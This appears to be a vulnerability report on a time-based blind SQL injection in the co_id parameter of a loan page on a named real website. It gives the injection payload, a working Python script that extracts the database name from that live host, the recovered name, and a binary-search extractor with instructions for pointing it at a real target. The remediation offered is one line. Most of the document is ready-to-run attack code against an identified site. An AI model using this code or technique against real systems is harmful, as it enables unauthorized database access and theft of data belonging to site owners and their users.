url:http://www.daimayi.com/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/1
There is SQL injection here (the co_id path segment is concatenated into the query).
payload: if(ascii(substring(database(),%s,1))=%s,1,sleep(5))
If sleep() is put in the middle (true) branch of the if(), a request either hangs for a very long time or returns a 504, so I put sleep() in the last (false) branch instead. A true condition returns 1 immediately and the normal page renders; a false condition sleeps and the client times out. So instead of measuring delay, the script just checks whether the response body contains a keyword from the normal page. The keyword chosen here is 1140.00.
Injection result:
database: huomayi
Python script (ported to Python 3):

import http.client
import string
import urllib.parse

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Candidate characters for the database name: a-z, 0-9 and a few symbols.
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.', '-', '\\', ' ']

# Marker that only appears on the normally rendered page. A true condition
# returns 1 and the page comes back at once; a false condition runs sleep(5),
# which trips the 5-second client timeout below and is treated as a miss.
verify = "1140.00"

print('Try to retrieve database:')
for i in range(1, 11):
    for payload in payloads:
        try:
            conn = http.client.HTTPConnection('www.daimayi.com', timeout=5)
            s = "if(ascii(substring(database(),%s,1))=%s,1,sleep(5))" % (i, ord(payload))
            params = urllib.parse.quote(s)
            conn.request(method='GET',
                         url='/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/' + params,
                         headers=headers)
            html_doc = conn.getresponse().read().decode('utf-8', 'ignore')
            if verify in html_doc:
                print(payload)
                break
        except Exception:
            # socket timeout on the false branch, or any network error: treat as no match
            pass
print("Done")
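The technique above (sleep() in the false branch, a client timeout shorter than the sleep, and a keyword check on the page) turns a time-based injection into a boolean oracle. The added example below is not from the original report: it generalizes the script's linear scan over a fixed charset into a binary search on the ASCII value, which needs 7 requests per character regardless of charset. The target is replaced by a constructed stand-in (`simulated_request`) that evaluates the same if()/substring()/ascii() expression against the name the page reports, "huomayi"; the `>` comparison, the request counter and the emulation itself are assumptions made for this example.

```python
import re
import socket

# Constructed stand-in for the target. "huomayi" is the name the page
# reports; the request emulation, the ">" comparison and the request
# counter are assumptions made for this example, not part of the original.
SIMULATED_DB_NAME = "huomayi"
KEYWORD = "1140.00"            # marker present only on the normally rendered page
STATS = {"requests": 0}        # how many requests the extraction issued

PAYLOAD = "if(ascii(substring(database(),{pos},1)){op}{val},1,sleep(5))"
_PAYLOAD_RE = re.compile(
    r"if\(ascii\(substring\(database\(\),(\d+),1\)\)(=|>)(\d+),1,sleep\(\d+\)\)")


def simulated_request(injected: str) -> str:
    """Emulate the vulnerable endpoint evaluating the injected expression.

    True branch: the query returns 1 and the normal page (with KEYWORD) comes back.
    False branch: the server would sleep(5); the client's 5 s timeout then
    fires, modelled here as socket.timeout (what http.client raises).
    """
    STATS["requests"] += 1
    m = _PAYLOAD_RE.fullmatch(injected)
    if m is None:
        return "<html>error</html>"
    pos, op, val = int(m.group(1)), m.group(2), int(m.group(3))
    ch = SIMULATED_DB_NAME[pos - 1:pos]      # MySQL substring() is 1-indexed
    code = ord(ch) if ch else 0              # MySQL ascii('') == 0 past the end
    cond = (code == val) if op == "=" else (code > val)
    if cond:
        return "<html><body>... 1140.00 ...</body></html>"
    raise socket.timeout("timed out")


def oracle(pos: int, op: str, val: int, request=simulated_request) -> bool:
    """One boolean question to the target: is ascii(char[pos]) <op> val?
    Keyword present -> True; timeout (the sleep branch) -> False."""
    try:
        return KEYWORD in request(PAYLOAD.format(pos=pos, op=op, val=val))
    except socket.timeout:
        return False


def extract_char(pos: int, request=simulated_request) -> int:
    """Binary search on the ASCII value (0..127): exactly 7 requests per
    position instead of one request per candidate character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, ">", mid, request):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_database(max_len: int = 32, request=simulated_request) -> str:
    """Read database() one character at a time; ascii() == 0 marks the end."""
    name = []
    for pos in range(1, max_len + 1):
        code = extract_char(pos, request)
        if code == 0:
            break
        name.append(chr(code))
    return "".join(name)


if __name__ == "__main__":
    print(extract_database(), STATS["requests"], "requests")
```

Against a live target, `simulated_request` would be swapped for a function doing the same GET as the script above, keeping the client timeout below the sleep() argument. Because every false answer costs a full timeout, request count dominates run time: extracting the 7-character name plus the terminator takes 56 requests here, versus up to 42 per position with the page's charset scan. A transient network error also surfaces as a timeout and therefore as "false", so on a real target it is worth confirming each recovered character with an "=" probe before moving on.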
Remediation: filter the input.